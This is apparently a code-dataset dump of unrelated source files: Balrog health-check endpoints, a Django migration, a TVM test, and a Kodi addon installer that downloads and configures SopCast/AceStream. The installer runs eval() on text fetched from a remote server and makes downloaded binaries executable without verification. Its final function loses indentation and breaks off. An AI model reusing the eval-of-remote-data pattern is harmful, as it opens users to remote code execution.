code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
from os import path
from flask import Response, jsonify
from auslib.global_state import dbo
def _heartbeat_database_fn(dbo):
    """Default database check used by /__heartbeat__.

    Performs a write (incrementing the dockerflow watchdog value) rather than
    a read, so a successful call shows the connection is up and the configured
    credentials actually work.
    """
    return dbo.dockerflow.incrementWatchdogValue(changed_by="dockerflow")
def heartbeat_response(heartbeat_database_fn):
    """Per the Dockerflow spec:

    Respond to /__heartbeat__ with a HTTP 200 or 5xx on error. This should
    depend on services like the database to also ensure they are healthy.
    """
    cache_headers = {"Cache-Control": "public, max-age=60"}
    try:
        body = str(heartbeat_database_fn(dbo))
    except Exception:
        # Any failure while touching the database is reported as a 502 so
        # monitoring notices the outage.
        return Response(status=502, response="Can't connect to the database.", headers=cache_headers)
    return Response(body, headers=cache_headers)
def lbheartbeat_response():
    """Per the Dockerflow spec:

    Respond to /__lbheartbeat__ with an HTTP 200. This is for load balancer
    checks and should not check any dependent services.
    """
    no_cache = {"Cache-Control": "no-cache"}
    return Response(response="OK!", headers=no_cache)
def get_version(version_file):
    """Serve the Dockerflow /__version__ payload.

    When `version_file` is set and exists on disk its contents are returned
    verbatim as JSON; otherwise a placeholder document is produced.
    """
    # Guard clause: no usable version file -> canned "unknown" document.
    if not version_file or not path.exists(version_file):
        return jsonify({"source": "https://github.com/mozilla/balrog", "version": "unknown", "commit": "unknown"})
    with open(version_file) as f:
        version_json = f.read()
    return Response(version_json, mimetype="application/json", headers={"Cache-Control": "no-cache"})
# Keeping flask dockerflow endpoints here to maintain the admin api compatibility.
def create_dockerflow_endpoints(app, heartbeat_database_fn=_heartbeat_database_fn):
    """ Wrapper that creates the endpoints required by CloudOps' Dockerflow spec:
    https://github.com/mozilla-services/Dockerflow. This gets used by both the admin and public apps.

    :param heartbeat_database_fn: Function that calls the database when responding to /__heartbeat__.
    A database object is passed to this function.
    If heartbeat_database_fn is None, a default function is set. The default function writes in a
    dummy table. Even though we respond to GET, we do insert/update something in the database. This
    allows us to see if the connection to the database exists, is active, and if the credentials given
    are the correct ones. For more context see bug 1289178.
    """

    @app.route("/__heartbeat__")
    def heartbeat():
        # Delegates to the module-level helper so the response logic is shared.
        return heartbeat_response(heartbeat_database_fn)

    @app.route("/__lbheartbeat__")
    def lbheartbeat():
        return lbheartbeat_response()

    @app.route("/__version__")
    def version():
        version_file = app.config.get("VERSION_FILE")
        return get_version(version_file)
from django.db import migrations, models
class Migration(migrations.Migration):
    # Second migration of the lookuperror_a test app: introduces the A2
    # model, which carries nothing beyond its auto-generated primary key.

    dependencies = [("lookuperror_a", "0001_initial")]

    operations = [
        migrations.CreateModel(
            name="A2",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
            ],
        ),
    ]
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test code for L2 normalization"""
import numpy as np
import tvm
import topi
from topi.util import get_const_tuple
import topi.testing
def verify_l2_normalize(ishape, eps, axis=None):
    """Build topi's l2_normalize for `ishape`, run it on every enabled
    device, and compare against the numpy reference implementation.

    Parameters mirror topi.nn.l2_normalize: `eps` is the stabilising
    epsilon, `axis` the reduction axes (None means all axes).
    """
    A = tvm.placeholder(ishape, name='A')
    B = topi.nn.l2_normalize(A, eps, axis)
    dtype = A.dtype
    # Reference input/output computed once and reused for every device.
    a_np = np.random.uniform(size=ishape).astype(dtype)
    b_np = topi.testing.l2_normalize_python(a_np, eps, axis)

    def check_device(device):
        ctx = tvm.context(device, 0)
        if not ctx.exist:
            print("Skip because %s is not enabled" % device)
            return
        print("Running on target: %s" % device)
        with tvm.target.create(device):
            # llvm uses the generic schedule; everything else goes through
            # the cuda (GPU-style) schedule.
            if device == 'llvm':
                s = topi.generic.schedule_l2_normalize([B])
            else:
                s = topi.cuda.schedule_l2_normalize([B])
        a = tvm.nd.array(a_np, ctx)
        b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=dtype), ctx)
        f = tvm.build(s, [A, B], device)
        f(a, b)
        tvm.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)

    for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan', 'nvptx']:
        check_device(device)
def test_l2_normalize():
    """Exercise verify_l2_normalize over a spread of axis configurations."""
    shape = (1, 3, 20, 20)
    eps = 0.001
    for axes in [None, (1,), (1, 2), (2, 3), (0, 3), (0, 2, 3)]:
        verify_l2_normalize(shape, eps, axes)
# Allow running this test file directly (test runners normally collect it).
if __name__ == "__main__":
    test_l2_normalize()
# -*- coding: utf-8 -*-
""" Plexus (c) 2015 enen92
This file contains the addon's first-boot setup code. It runs on the addon first boot to download and configure the system for acestream/sopcast. The platform will be automatically detected and the necessary files downloaded and extracted to the userdata.
This code will run if and only if the setting "Download modules" on boot is enabled.
Functions:
check_for_updates() -> Look for module updates between versions, force download them
firstconf() -> Configuration function, detects the platform, saves to settings, run configure sopcast/acestream functions
configure_sopcast() -> Configure Sopcast
configure_acestream() -> Configure Acestream
"""
import xbmc
import xbmcgui
import xbmcplugin
import xbmcvfs
import tarfile
import os
import re
import sys
import subprocess
import shutil
from plexusutils.pluginxbmc import *
from plexusutils.webutils import download_tools,get_page_source
from plexusutils.utilities import *
""" Platform dependent files downloaded during the addon configuration"""
# Base SVN trunk from which every module bundle is fetched.
trunkfolder = "https://plexus.svn.codeplex.com/svn/trunk"
# Remote manifest mapping platform -> latest sopcast/acestream versions.
version_control = trunkfolder + "/Control/versions.info"
#Linux Arm
sopcast_raspberry = trunkfolder + "/Modules/Linux/arm/rpi2/sopcast-raspberry.tar.gz"
acestream_rpi2 = trunkfolder + "/Modules/Linux/arm/rpi2/acestream-rpi2.tar.gz"
#Linux i386 and x86_64 (including openelec)
sopcast_linux_generico = trunkfolder + "/Modules/Linux/Sopcastx86_64i386/sopcast_linux.tar.gz"
openelecx86_64_sopcast = trunkfolder + "/Modules/Linux/x86_64/Openelec/sopcast_openelec64.tar.gz"
# NOTE: the "openeelc" (sic) spelling below is kept as-is -- these names are
# referenced elsewhere in this module.
openeelcx86_64_acestream = trunkfolder + "/Modules/Linux/x86_64/Openelec/acestream_openelec64_3051.tar.gz"
openelecxi386_sopcast = trunkfolder + "/Modules/Linux/i386/openelec/sopcast_openeleci386.tar.gz"
openeelcxi386_acestream = trunkfolder + "/Modules/Linux/i386/openelec/acestream_openeleci386_303fix.tar.gz"
#gen linux
acestream_linux_x64_generic = trunkfolder + "/Modules/Linux/x86_64/acestream-linux-x86_64_3051.tar.gz"
acestream_linux_i386_generic = trunkfolder + "/Modules/Linux/i386/acestream-linux-i386_303.tar.gz"
#Android
sopcast_apk = trunkfolder + "/Modules/Android/SopCast.apk.tar.gz"
# arm and x86 currently point at the same 2-in-1 apk bundle.
acestreamengine_apk_arm = trunkfolder + "/Modules/Android/AceStream-3.0.6-2in1.apk.tar.gz"
acestreamengine_apk_x86 = trunkfolder + "/Modules/Android/AceStream-3.0.6-2in1.apk.tar.gz"
android_aceengine_arm = trunkfolder + "/Modules/Android/org.acestream.engine-arm-3.0.6.tar.gz"
android_aceengine_x86 = trunkfolder + "/Modules/Android/org.acestream.engine_x86.tar.gz"
android_aceplayer_arm = trunkfolder + "/Modules/Android/AcePlayer-3.0.6-2in1.apk.tar.gz"
android_aceplayer_x86 = trunkfolder + "/Modules/Android/AcePlayer-3.0.6-2in1.apk.tar.gz"
#Mac OSX #TODO
osx_i386_sopcast = trunkfolder + "/Modules/MacOsx/i386/sopcast_osxi386.tar.gz"
osx_i386_acestream = trunkfolder + "/Modules/MacOsx/AceStreamWineOSX.zip"
osx_x64_sopcast = trunkfolder + "/Modules/MacOsx/x86_64/sopcast_osx64.tar.gz"
osx_x64_acestream = trunkfolder + "/Modules/MacOsx/AceStreamWineOSX.zip"
#Windows Files
acestream_windows = trunkfolder + "/Modules/Windows/acewindows-aceengine3.0.4.tar.gz"
srvany_executable = trunkfolder + "/Modules/Windows/srvany.tar.gz"
srvany_permissions = trunkfolder + "/Modules/Windows/sopcastp2p-permissions.txt"
def check_for_updates():
    """Fetch the remote version manifest and, for the detected platform,
    re-run the sopcast/acestream configuration when the stored versions
    differ from the manifest's."""
    try:
        version_source = get_page_source(version_control)
    except: version_source = ""
    if version_source:
        # NOTE(review): eval() of remotely fetched text executes arbitrary
        # code if the host is ever compromised -- ast.literal_eval would be
        # a safer way to parse the manifest.
        version_source = eval(version_source)
        # Map the running system to a manifest platform key.
        if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
            if "arm" in os.uname()[4]:
                # NOTE(review): if the 'rpi2' setting is not "true", platf is
                # never assigned on ARM and the lookups below raise NameError
                # (silently swallowed by the bare excepts).
                if settings.getSetting('rpi2') == "true": platf = "rpi2"
            elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
                if settings.getSetting('openeleci386') == "true": platf = "openeleci386"
                else: platf = "linuxi386"
            elif os.uname()[4] == "x86_64":
                if settings.getSetting('openelecx86_64') == "true": platf = "openelecx64"
                else: platf = "linux_x86_64"
        elif xbmc.getCondVisibility('system.platform.windows'): platf = "windows"
        elif xbmc.getCondVisibility('system.platform.Android'): platf = "android"
        elif xbmc.getCondVisibility('System.Platform.OSX'):
            if os.uname()[4] == "i386" or os.uname()[4] == "i686": platf = "osx32"
            elif os.uname()[4] == "x86_64": platf = "osx64"
        # Reconfigure each module only when the manifest version differs
        # from the locally stored one; any failure marks it not-updated.
        try:
            if version_source["sopcast"][platf] != settings.getSetting('sopcast_version'): configure_sopcast(version_source["sopcast"][platf])
            sopcast_update = True
        except: sopcast_update = False
        try:
            if version_source["acestream"][platf] != settings.getSetting('acestream_version'): configure_acestream(version_source["acestream"][platf])
            acestream_update = True
        except: acestream_update = False
        # NOTE(review): 'versao' is not defined anywhere in this function or
        # module -- this line raises NameError when both updates succeed.
        # Presumably a manifest version string was intended; confirm upstream.
        if acestream_update and sopcast_update: settings.setSetting('last_version_check',value=versao)
    return
def first_conf():
    """First-boot configuration: reset stored versions, detect the platform
    (asking the user where detection is ambiguous), persist the platform
    flags in the addon settings and trigger the module download."""
    # Reset version bookkeeping so check_for_updates() downloads everything.
    settings.setSetting('last_version_check',value='')
    settings.setSetting('sopcast_version',value='')
    settings.setSetting('acestream_version',value='')
    if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
        if "arm" in os.uname()[4]:
            # ARM Linux: only Raspberry PI 2 is supported; ask to confirm.
            mensagemok(translate(30000),translate(30128),translate(30129))
            OS_list = ["Raspberry PI 2"]
            choose=xbmcgui.Dialog().select(translate(30130),OS_list)
            if choose > -1:
                OS_Choose= OS_list[choose]
                if OS_Choose.lower() == "raspberry pi 2":
                    settings.setSetting('rpi2',value='true')
                    check_for_updates()
        else:
            #32bit and 64bit
            # NOTE(review): re.search(pattern, string) -- the arguments here
            # look swapped (the hostname is used as the pattern searched
            # inside the literal "openelec"); confirm intent upstream.
            if os.uname()[4] == "x86_64":
                if re.search(os.uname()[1],"openelec",re.IGNORECASE):
                    settings.setSetting('openelecx86_64',value='true')
                else:
                    # Hostname did not reveal OpenELEC; ask the user.
                    opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30074))
                    if opcao:
                        settings.setSetting('openelecx86_64',value='true')
            elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
                if re.search(os.uname()[1],"openelec",re.IGNORECASE):
                    settings.setSetting('openeleci386',value='true')
                else:
                    opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30075))
                    if opcao:
                        settings.setSetting('openeleci386',value='true')
            check_for_updates()
    elif xbmc.getCondVisibility('system.platform.windows'):
        check_for_updates()
    elif xbmc.getCondVisibility('system.platform.Android'):
        check_for_updates()
    elif xbmc.getCondVisibility('System.Platform.OSX'):
        mensagemok(translate(30000),"Not available for OSX for now")
        sys.exit(0)
        #check_for_updates()
    # Mark the one-shot auto configuration as done.
    settings.setSetting('autoconfig',value="false")
def configure_sopcast(latest_version):
    """Download and install the SopCast module for the detected platform.

    :param latest_version: version string to store in the 'sopcast_version'
                           setting once installation finishes (falsy -> not
                           stored).

    Side effects: downloads platform bundles into the addon/userdata
    folders, extracts them, marks binaries executable, and (on Windows)
    creates and configures a 'sopcastp2p' service via sc/regedit/regini.
    """
    #Configuration for LINUX
    if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
        print("Detected OS: Linux")
        #Linux Armv
        if "arm" in os.uname()[4]:
            print("Sopcast Configuration - LINUX ARM")
            if settings.getSetting('rpi2') == "true":
                print("Raspberry PI 2")
                SPSC_KIT = os.path.join(addonpath,sopcast_raspberry.split("/")[-1])
                download_tools().Downloader(sopcast_raspberry,SPSC_KIT,translate(30076),translate(30000))
                if tarfile.is_tarfile(SPSC_KIT):
                    path_libraries = os.path.join(pastaperfil,"sopcast")
                    download_tools().extract(SPSC_KIT,path_libraries)
                    xbmc.sleep(500)
                    download_tools().remove(SPSC_KIT)
                if latest_version: settings.setSetting('sopcast_version',value=latest_version)
                return
        elif os.uname()[4] == "x86_64":
            generic = False
            if settings.getSetting('openelecx86_64') == "true":
                print("Detected OpenELEC x86_64")
                SPSC_KIT = os.path.join(addonpath,openelecx86_64_sopcast.split("/")[-1])
                download_tools().Downloader(openelecx86_64_sopcast,SPSC_KIT,translate(30076),translate(30000))
                if tarfile.is_tarfile(SPSC_KIT):
                    download_tools().extract(SPSC_KIT,pastaperfil)
                    xbmc.sleep(500)
                    download_tools().remove(SPSC_KIT)
                if latest_version: settings.setSetting('sopcast_version',value=latest_version)
                return
            else: generic = True
        elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
            generic = False
            if settings.getSetting('openeleci386') == "true":
                SPSC_KIT = os.path.join(addonpath,openelecxi386_sopcast.split("/")[-1])
                download_tools().Downloader(openelecxi386_sopcast,SPSC_KIT,translate(30076),translate(30000))
                if tarfile.is_tarfile(SPSC_KIT):
                    download_tools().extract(SPSC_KIT,pastaperfil)
                    xbmc.sleep(500)
                    download_tools().remove(SPSC_KIT)
                if latest_version: settings.setSetting('sopcast_version',value=latest_version)
                return
            else: generic = True
        # Generic (non-OpenELEC) linux: install the portable bundle and make
        # every file in it executable.
        if generic == True:
            SPSC_KIT = os.path.join(addonpath,sopcast_linux_generico.split("/")[-1])
            download_tools().Downloader(sopcast_linux_generico,SPSC_KIT,translate(30076),translate(30000))
            if tarfile.is_tarfile(SPSC_KIT):
                path_libraries = os.path.join(pastaperfil,"sopcast")
                download_tools().extract(SPSC_KIT,path_libraries)
                xbmc.sleep(500)
                download_tools().remove(SPSC_KIT)
            #set every single file from the bundle as executable
            path_libraries = os.path.join(pastaperfil,"sopcast")
            dirs, files = xbmcvfs.listdir(path_libraries)
            for ficheiro in files:
                binary_path = os.path.join(path_libraries,ficheiro)
                st = os.stat(binary_path)
                import stat
                os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
            path_libraries = os.path.join(path_libraries,"lib")
            dirs, files = xbmcvfs.listdir(path_libraries)
            for ficheiro in files:
                binary_path = os.path.join(path_libraries,ficheiro)
                st = os.stat(binary_path)
                import stat
                os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
            if latest_version: settings.setSetting('sopcast_version',value=latest_version)
            return
    elif xbmc.getCondVisibility('system.platform.windows'):
        print("Detected OS: Windows")
        if not xbmcvfs.exists(pastaperfil): xbmcvfs.mkdir(pastaperfil)
        #Sop
        import ctypes
        # Service creation and registry edits require elevation.
        is_admin=ctypes.windll.shell32.IsUserAnAdmin() != 0
        if is_admin == False:
            mensagemok(translate(30000),translate(30077),translate(30078))
        else:
            # Remove any previously created service before reinstalling.
            cmd = ['sc','delete','sopcastp2p']
            proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
            for line in proc.stdout:
                print("cmd out: " + line.rstrip())
            xbmc.sleep(1000)
            ret = mensagemprogresso.create(translate(30000),translate(30000))
            mensagemprogresso.update(0,translate(30117)," ")
            xbmc.sleep(1000)
            import _winreg
            # Locate the installed SopCast player through the registry.
            aReg = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
            try:
                aKey = _winreg.OpenKey(aReg, r'SOFTWARE\SopCast\Player\InstallPath',0, _winreg.KEY_READ)
                name, value, type = _winreg.EnumValue(aKey, 0)
                sopcast_executable = value
                print("Installation executable of sopcast was found: " + sopcast_executable)
                _winreg.CloseKey(aKey)
                mensagemprogresso.update(10,translate(30079),translate(30080))
            except:
                sopcast_executable = ""
                mensagemok(translate(30000),translate(30081),translate(30082))
            if not sopcast_executable: pass
            else:
                xbmc.sleep(1000)
                mensagemprogresso.update(20,translate(30083)," ")
                xbmc.sleep(1000)
                print ("Getting windows users IDS")
                # Enumerate SIDs of real (non-system) user profiles; they are
                # later granted start/stop rights on the service.
                aReg = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
                aKey = _winreg.OpenKey(aReg, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList')
                users = []
                for i in range(1024):
                    try:
                        asubkey=_winreg.EnumKey(aKey,i)
                        print(asubkey)
                        aKeydois = _winreg.OpenKey(aReg, os.path.join('SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList',asubkey))
                        val=_winreg.QueryValueEx(aKeydois, "ProfileImagePath")
                        try:
                            print(val[0])
                        except:
                            print("Notice: User with strange characters, print cmd ignored.")
                        if "Windows" in val[0] or "%systemroot%" in val[0]:
                            pass
                        else:
                            users.append(asubkey)
                    except:
                        pass
                if not users:
                    mensagemok(translate(30000),translate(30084))
                else:
                    mensagemprogresso.update(30,translate(30085),translate(30080))
                    xbmc.sleep(200)
                    mensagemprogresso.update(30,translate(30086)," ")
                    xbmc.sleep(1000)
                    print("System Users", users)
                    # srvany.exe wraps SopCast.exe so it can run as a service.
                    srvany_final_location = os.path.join(sopcast_executable.replace("SopCast.exe",""),"srvany.exe")
                    srvany_download_location = os.path.join(addonpath,"srvany.exe")
                    srvanytgz_download_location = os.path.join(addonpath,"srvany.tar.gz")
                    download_tools().Downloader(srvany_executable,srvanytgz_download_location,translate(30087),translate(30000))
                    xbmc.sleep(1000)
                    if tarfile.is_tarfile(srvanytgz_download_location):
                        path_libraries = addonpath
                        download_tools().extract(srvanytgz_download_location,path_libraries)
                        xbmcvfs.copy(srvany_download_location,srvany_final_location)
                        download_tools().remove(srvanytgz_download_location)
                        download_tools().remove(srvany_download_location)
                    xbmc.sleep(1000)
                    ret = mensagemprogresso.create(translate(30000),translate(30000))
                    xbmc.sleep(200)
                    mensagemprogresso.update(35,translate(30088)," ")
                    xbmc.sleep(1000)
                    cmd = ['sc','create','sopcastp2p','binpath=',os.path.join(os.path.join(sopcast_executable.replace("SopCast.exe","")),'srvany.exe')]
                    proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
                    servicecreator = False
                    for line in proc.stdout:
                        print ("cmd out: " + line.rstrip())
                        servicecreator = True
                    if servicecreator == False:
                        mensagemok(translate(30000),translate(30089))
                    else:
                        mensagemprogresso.update(40,translate(30088),translate(30080))
                        xbmc.sleep(1000)
                        mensagemprogresso.update(45,translate(30090)," ")
                        xbmc.sleep(1000)
                        print("Trying to modify regedit....")
                        # Point the srvany service at SopCast.exe with the
                        # sop:// parameter.
                        try:
                            aReg = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
                            key = _winreg.CreateKey(aReg, r'SYSTEM\CurrentControlSet\Services\sopcastp2p\Parameters')
                            _winreg.SetValueEx(key, 'AppDirectory', 0, _winreg.REG_SZ, os.path.join(sopcast_executable.replace("SopCast.exe","")))
                            _winreg.SetValueEx(key, 'Application', 0, _winreg.REG_SZ, os.path.join(os.path.join(sopcast_executable.replace("SopCast.exe","")),"SopCast.exe"))
                            _winreg.SetValueEx(key, 'AppParameters', 0, _winreg.REG_SZ, "sop://")
                            mensagemprogresso.update(50,translate(30090), translate(30080))
                            regedit = True
                        except:
                            mensagemok(translate(30000),translate(30091))
                            regedit = False
                        if regedit == False: pass
                        else:
                            xbmc.sleep(1000)
                            mensagemprogresso.update(50,translate(30092), " ")
                            # Read the service's security descriptor (SDDL).
                            cmd = ['sc','sdshow','sopcastp2p']
                            proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
                            lines = []
                            for line in proc.stdout:
                                print(line.rstrip())
                                if line.rstrip() != "" and "(" in line.rstrip(): lines.append(line.rstrip())
                                else: pass
                            if len(lines) != 1: mensagemok(translate(30000),translate(30093))
                            else:
                                # Grant each collected user SID start/stop
                                # rights by injecting ACEs into the SDDL.
                                linha_arr = []
                                for user in users:
                                    linha_arr.append('(A;;RPWPCR;;;' + user + ')')
                                linha_add = ''
                                for linha in linha_arr:
                                    linha_add += linha
                                print("line piece to add: " + linha_add)
                                linha_final = lines[0].replace("S:(",linha_add + "S:(")
                                print("Final line: " + linha_final)
                                permissions = False
                                xbmc.sleep(500)
                                mensagemprogresso.update(60,translate(30092), translate(30080))
                                xbmc.sleep(500)
                                mensagemprogresso.update(60,translate(30094), " ")
                                cmd = ['sc','sdset','sopcastp2p',linha_final]
                                proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
                                for line in proc.stdout:
                                    print(line.rstrip())
                                    permissions = True
                                if permissions == False: mensagemok(translate(30000),translate(30095))
                                else:
                                    mensagemprogresso.update(70,translate(30094), translate(30080))
                                    xbmc.sleep(1000)
                                    mensagemprogresso.update(70,translate(30096), " ")
                                    print("Trying to set sopcastp2p service regedit permissions...")
                                    # regini applies registry permissions from
                                    # the downloaded permissions file.
                                    download_tools().Downloader(srvany_permissions,os.path.join(pastaperfil,"sopcastp2p-permissions.txt"),translate(30097),translate(30000))
                                    xbmc.sleep(500)
                                    ret = mensagemprogresso.create(translate(30000),translate(30000))
                                    xbmc.sleep(500)
                                    mensagemprogresso.update(80,translate(30098), " ")
                                    xbmc.sleep(1000)
                                    cmd = ['regini',os.path.join(pastaperfil,"sopcastp2p-permissions.txt")]
                                    proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
                                    for line in proc.stdout:
                                        print(line.rstrip())
                                    mensagemprogresso.update(90,translate(30098), translate(30098))
                                    mensagemprogresso.update(100,translate(30099), " ")
                                    xbmc.sleep(2000)
                                    mensagemprogresso.close()
        if latest_version: settings.setSetting('sopcast_version',value=latest_version)
        return
    elif xbmc.getCondVisibility('System.Platform.OSX'):
        print("Detected OS: Mac OSX")
        available = False
        if os.uname()[-1] == "x86_64":
            mac_package = osx_x64_sopcast
            available = True
        elif os.uname()[-1] == "i386":
            mac_package = osx_i386_sopcast
            available = True
        else:
            available = False
        if available == True:
            if not os.path.exists(pastaperfil):
                xbmcvfs.mkdir(pastaperfil)
            MAC_KIT = os.path.join(addonpath,mac_package.split("/")[-1])
            download_tools().Downloader(mac_package,MAC_KIT,translate(30076),translate(30000))
            if tarfile.is_tarfile(MAC_KIT):
                path_libraries = os.path.join(pastaperfil)
                download_tools().extract(MAC_KIT,pastaperfil)
                download_tools().remove(MAC_KIT)
            # Make the sp-sc-auth client executable.
            sp_sc_auth = os.path.join(pastaperfil,"sopcast","sp-sc-auth")
            st = os.stat(sp_sc_auth)
            import stat
            os.chmod(sp_sc_auth, st.st_mode | stat.S_IEXEC)
            if latest_version: settings.setSetting('sopcast_version',value=latest_version)
            return
        else:
            mensagemok(translate(30000),translate(30100))
            return
    elif xbmc.getCondVisibility('System.Platform.Android'):
        print("Detected OS: Android")
        #Sopcast configuration
        print("Starting SopCast Configuration")
        #Moving sopclient to ext4 hack - tks steeve from xbmctorrent
        sopclient_builtin_location = os.path.join(addonpath,"resources","binaries","sopclient")
        #Hack to get current xbmc app id
        xbmcfolder=xbmc.translatePath(addonpath).split("/")
        found = False
        if settings.getSetting('auto_appid') == 'true':
            i = 0
            sopcast_installed = False
            # The app id is the first path component that looks like a
            # package name (two or more dots) and is not the addon id.
            for folder in xbmcfolder:
                if folder.count('.') >= 2 and folder != addon_id :
                    found = True
                    break
                else:
                    i+=1
            if found == True:
                uid = os.getuid()
                app_id = xbmcfolder[i]
        else:
            if settings.getSetting('custom_appid') != '':
                uid = os.getuid()
                app_id = settings.getSetting('custom_appid')
                found = True
        if found == True:
            xbmc_data_path = os.path.join("/data", "data", app_id)
            # Only proceed when Kodi's data dir exists and we own it.
            if os.path.exists(xbmc_data_path) and uid == os.stat(xbmc_data_path).st_uid:
                android_binary_dir = os.path.join(xbmc_data_path, "files", "program.plexus")
                if not os.path.exists(android_binary_dir):
                    os.makedirs(android_binary_dir)
                android_binary_path = os.path.join(android_binary_dir, "sopclient")
                if not os.path.exists(android_binary_path) or os.path.getsize(android_binary_path) != os.path.getsize(sopclient_builtin_location):
                    shutil.copy2(sopclient_builtin_location, android_binary_path)
                binary_path = android_binary_path
                st = os.stat(binary_path)
                import stat
                os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
                settings.setSetting('android_sopclient',value=binary_path)
                # Ask whether to use the external SopCast app or the
                # embedded client.
                opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30101),translate(30103))
                if not opcao:
                    settings.setSetting('external-sopcast',value='1')
                    sopcast_installed = True
                    mensagemok(translate(30000),translate(30099))
                else:
                    mensagemok(translate(30000),translate(30104))
                    if os.path.exists(os.path.join("sdcard","Download")):
                        pasta = os.path.join("sdcard","Download")
                        sopfile = os.path.join("sdcard","Download",sopcast_apk.split("/")[-1])
                    else:
                        dialog = xbmcgui.Dialog()
                        pasta = dialog.browse(int(0), translate(30105), 'videos')
                        sopfile = os.path.join(pasta,sopcast_apk.split("/")[-1])
                    download_tools().Downloader(sopcast_apk,sopfile,translate(30106),translate(30000))
                    if tarfile.is_tarfile(sopfile):
                        download_tools().extract(sopfile,pasta)
                        download_tools().remove(sopfile)
                        mensagemok(translate(30000),translate(30107),pasta,translate(30108))
                        sopcast_installed = True
                        settings.setSetting('external-sopcast',value='0')
                        mensagemok(translate(30000),translate(30099))
                if latest_version: settings.setSetting('sopcast_version',value=latest_version)
                return
        else:
            mensagemok(translate(30000),translate(30109))
            return
def configure_acestream(latest_version):
#Configuration for LINUX
if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
print("Detected OS: Linux")
if "arm" in os.uname()[4]:
print("Linux Arm")
if settings.getSetting('rpi2') == "true":
ACE_KIT = os.path.join(addonpath,acestream_rpi2.split("/")[-1])
download_tools().Downloader(acestream_rpi2,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
path_libraries = os.path.join(pastaperfil)
download_tools().extract(ACE_KIT,path_libraries)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
#set chroot to executable
binary_path = os.path.join(pastaperfil,"acestream","chroot")
st = os.stat(binary_path)
import stat
os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif os.uname()[4] == "x86_64":
if settings.getSetting('openelecx86_64') == "true":
print("OpenELEC x86_64 Acestream configuration")
ACE_KIT = os.path.join(addonpath,openeelcx86_64_acestream.split("/")[-1])
download_tools().Downloader(openeelcx86_64_acestream ,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
else:
print("64 bit Linux Disto Acestream Configuration")
ACE_KIT = os.path.join(addonpath,acestream_linux_x64_generic.split("/")[-1])
download_tools().Downloader(acestream_linux_x64_generic,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
if settings.getSetting('openeleci386') == "true":
print("32 bit Openelec Acestream Configuration")
ACE_KIT = os.path.join(addonpath,openeelcxi386_acestream.split("/")[-1])
download_tools().Downloader(openeelcxi386_acestream,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
else:
print("32 bit Linux general distro Acestream Configuration")
ACE_KIT = os.path.join(addonpath,acestream_linux_i386_generic.split("/")[-1])
download_tools().Downloader(acestream_linux_i386_generic,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif xbmc.getCondVisibility('system.platform.windows'):
print("Detected OS: Windows")
if not os.path.exists(pastaperfil): xbmcvfs.mkdir(pastaperfil)
#Ace
SPSC_KIT = os.path.join(addonpath,acestream_windows.split("/")[-1])
download_tools().Downloader(acestream_windows,SPSC_KIT,translate(30110),translate(30000))
